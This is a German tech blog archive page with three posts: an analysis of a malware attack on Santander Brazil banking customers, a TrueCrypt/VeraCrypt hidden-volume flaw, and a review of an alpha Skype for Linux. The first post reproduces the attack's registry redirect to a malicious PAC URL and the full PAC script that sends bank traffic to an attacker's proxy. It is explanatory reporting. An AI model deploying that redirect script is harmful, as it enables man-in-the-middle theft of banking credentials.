Category Archives: Windows

Wie man Onlinebanking belauscht

Posted on by

„Mami, warum darf ich nicht dieses Attachment öffnen?!!“

„DESWEGEN, Kind :  sans.edu – Example of Targeted Attack Through a Proxy PAC File „

Beschrieben wird in dem verlinkten Artikel ein Angriff auf die Benutzer der Santanderbank in Brasilien. Jetzt blocke ich bei mir eh alles was *com.br am Ende hat, da ich in Brasilien keine Freunde habe, aber scheinbar sehr viel zwilichtige Gestalten gerne meine Freund werden wollen, naja.. vermutlich doch eher Freund meines Rechners 🙂 . Egal, jedenfalls spart einem son Block jede Menge Spams auf Portugiesisch, dessen ich zwar entfernt mächtig bin, es mich aber nicht interessiert. Wer noch was pauschal blocken will, hier noch zwei Evergreens : „*com.ar“, „*com.ag“ und „*@zoho.com“ .  Zoho.com ist gefühlt vermutlich die größte Spamschleuder des Planeten.

Was aber tatsächlich am meisten Spams verhindert hat, war unserem Mailserver zu erzählen, daß er nur noch TLS Verbindungen akzeptiert. Das hat sämtliche Spambots kalt erwischt ( und noch dazu das BSI, Weltbild, Power-Netz, Otto und diverse andere Quellen unerwünschter Wer … ähm Newsletter … 😀 )

Man sollte sich auch nichts erzählen lassen, wer als Mailadmin kein TLS aktiviert hat, hat seinen Job nicht ordentlich gemacht. Wer einem also keine EMails mehr senden kann, sollte dafür die Schuld nicht beim Empfänger, sondern bei sich selbst suchen. Im zweiten Jahrzehnt des 21. Jahrhunderts gehört TLS einfach in jeden Mailserver, egal wo auf der Welt.

Zurück zum Angriff auf Kunden der Santander Bank

Der Artikel beschreibt, das eines Tages eine Email kam… so fängt es heute eigentlich immer an ;)… in der ein böses Attachment war.. ( deswegen haben wir Leute auf der Whiteliste, die uns Attachments schicken dürfen ) . Das Attachment enthielt eine kleine Schadsoftware die nichts weiter gemacht hat, als die Proxyeinstellungen von Winblöd zu ändern.

\REGISTRY\USER\S-1-5-21-xxxxxxxx\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL = http://chrome-ie.com.br/1.png

In dem „Bild“ steht natürlich nur Text drin:

function FindProxyForURL(url, host)
{
var a = "PROXY 200.98.202.51:1023";
if (shExpMatch(host, "www.san*ander.com.br*")) {
     return a;
}

if (shExpMatch(host, "san*ander.com.br*")) {
     return a;
}

return "DIRECT";
}

Dieses Proxyscript sorgt dann am Ende dafür, daß die Aufrüfe an die Bank zu dem Proxy Server umgeleitet werden. Damit HTTPS geht, jubelt einem das Attachment dann noch ein FAKE Root Cert der Santander Bank unter.  Fertig ist der Onlinebanking-Man-in-the-Middle-Angriff .

Bei Fragen wenden Sie sich bitte an die Designer von Windows 😀

TrueCrypt Schwachstelle verrät Hidden Volumes

Posted on by

In allen Versionen von TrueCrypt und VeraCrypt steckt ein konzeptueller Fehler: Ein Angreifer kann bestimmen, ob es einen versteckten Container gibt. Die Verschlüsselung der Container ist dabei nicht gefährdet, so daß alle, die keine Hidden Volumes benutzen, jetzt einfach auf VeraCrypt 1.18a updaten können, und fertig sind.  Alle anderen müssen leider weiterlesen.

Die Ursachen

Ursache des Bugs ist ein trivial anmutender Designfehler von TrueCrypt:

~ Hat man einen normalen Container, gibt es einen Partitionsheader mit den Daten darin, z.b. dem MasterKey, Größe usw.
~ Hat man aber einen versteckten Container, gibt es zwei Partitionsheader mit Informationen.

Der Entwickler von VeraCrypt, Mounir Idrassi, wird als Lösung des Problems jetzt in neu erzeugten Containern immer zwei Partitionsheader anlegen, so daß man anhand der bloßen Anzahl nicht mehr feststellen kann, ob es einen oder zwei echte Container gibt.

Interessant an VeraCrypt ist, daß sehr wenig Anpassungen in der Linux Sektion gemacht wurden, wogegen die Windowsseite vor Updates nur so strotzt.

Was Benutzer von Hidden Volumes jetzt tun müssen

So leid es mir tut dies sagen zu müssen, aber Ihr müßt Eure Hidden Volumes neu anlegen, nachdem Ihr auf VeraCrypt 1.18a aktualisiert habt. Es gibt leider keinen anderen Weg.

Links

Hinweis: Die 1.18a Version gibt es derzeit nur für Windows:

Release Notes von VeraCrypt
Download VeraCrypt 1.18 für Linux
Download VeraCrypt 1.18a für Windows

Quelle: golem.de

Neues Skype für Linux

Posted on by

Der eine oder andere hat es schon gelesen, Microsoft will neue Versionen von Skype als WEBRTC Version umsetzen. Die aktuelle ALPHA ist nur mit Chrome als Browser benutzbar und hat noch dazu das Manko, daß man sich mit Benutzern der Clientenversion nicht verbinden kann. Wann das umgesetzt sein wird, wird sich zeigen.

Das 64Bit Paket für Redhat, CentOS und Fedora braucht 138 MB (55 MB RPM) Platz auf der Platte, aber glücklicherweise keine Abhängigkeiten, die (bei mir) nicht schon drauf wären.

Die ersten Tests haben ergeben:

  1. es ist genauso schlecht, wie man es von M$ erwarten konnte: Platzverschwendung ohne Ende.
  2. Kaum noch Optionen zum Einstellen
  3. Obwohl zwei Dutzend Sprachpakete installiert wurden, kann man keine davon auswählen :facepalm:
  4. Die Fenster sind übergroß gestaltet und nehmen nur Platz weg. So „elegant“ wie das alte Skype ist es nicht und wird es auch nie wieder werden.
  5. Man kann nichtmal Mikro und Kamera auswählen.
  6. Wer sich den ersten Screenshot mal genauer ansieht, wird bemerken, daß der Splashscreen nicht abschliesst.
  7. Chatten geht.
  8. Anrufen .. naja, es hat geklingelt 🙂
  9. Angerufen werden .. öhm.. nein. Das ging nicht ( SkypeIN )
  10. Video Calls : gehen nicht.
  11. Wenn man den Account editieren will, lockt es einen auf die skype.com Webseite
  12. Positiv: Fensterskalierung

    Die Fensterskalierungoptions mit ZOOM IN/OUT macht es dann doch „etwas“ schlanker, aber nicht annäherend so gut wie das Alte.  Problem, der Font wird unleserlich klein. Wie es aussieht ist die Webanwendung Responsive programmiert worden. Ja, das Skype ist nur noch ne lokale WebApp 😀 Und weil es eine WebApp ist, ist der das Lesbarkeitsproblem egal 😉

Ein paar Screenshots :

 

Skype-4-Linux-1Riesig viel Platz verschwendet.
Skype-4-Linux-2Ihr seht richtig: DAS SIND ALLE OPTIONEN!

Fazit

Das es eine Alphaversion ist, merkt man. Das es besser wird, darf man nicht erwarten, man weiß ja von wem das verbrochen wird.

Am Ende wird es wohl funktionieren, aber ob wir es lieben werden, hmm.. da habe ich meine Zweifel.

Download: skype.com – Skype for Fedora